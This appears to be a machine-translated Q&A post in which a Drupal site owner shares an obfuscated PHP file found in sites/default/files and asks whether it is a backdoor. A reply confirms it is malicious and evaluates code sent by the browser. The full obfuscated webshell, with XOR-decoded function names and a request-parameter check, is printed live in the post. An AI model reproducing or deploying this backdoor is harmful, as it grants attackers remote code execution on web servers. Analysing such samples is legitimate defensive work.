这是代码:
<?php
$mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
$tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
$lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb@:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'@)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]@[7hXC"S
$tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
$kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U@ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O@*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK@_(8ocvKR=II@F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7@%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*@,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^@L9XHqE?2Vyn0mO#UT@Ez';$mynbq='5XNBz@';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD@t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
##_W}8|bSK^C#$J..a5:]s(
$sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt@GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|@o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O@f_IU^5WTG"tS!/
$wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y@pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh@DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
$kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a@j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD#@5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X@w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R@%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
$ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3@?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
$flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
$ryy='q0ht@';##rt3I]{hp6$AWo7yb@|xKCPo?VBY$[{[
$lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
/*[SXl3i[@y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';
?>
我试着弄清楚它是什么意思或者它想要做什么,但我觉得它可能有点超出我的理解范围。谁能告诉我,如果这实际上是一个恶意的后门脚本,发现它的方式到服务器?
我在drupal安装的sites/default/files中找到了这些代码。幸运的是,您不能从该文件夹中执行PHP,但这意味着"普通"或"匿名"用户试图上传此文件。
这是恶意的,但是它动态评估浏览器提供的代码,因此我们无法确定对它执行了什么。这是可能的,它是使用在一个文件包含攻击,所以能够执行php在它的存储位置关系不大。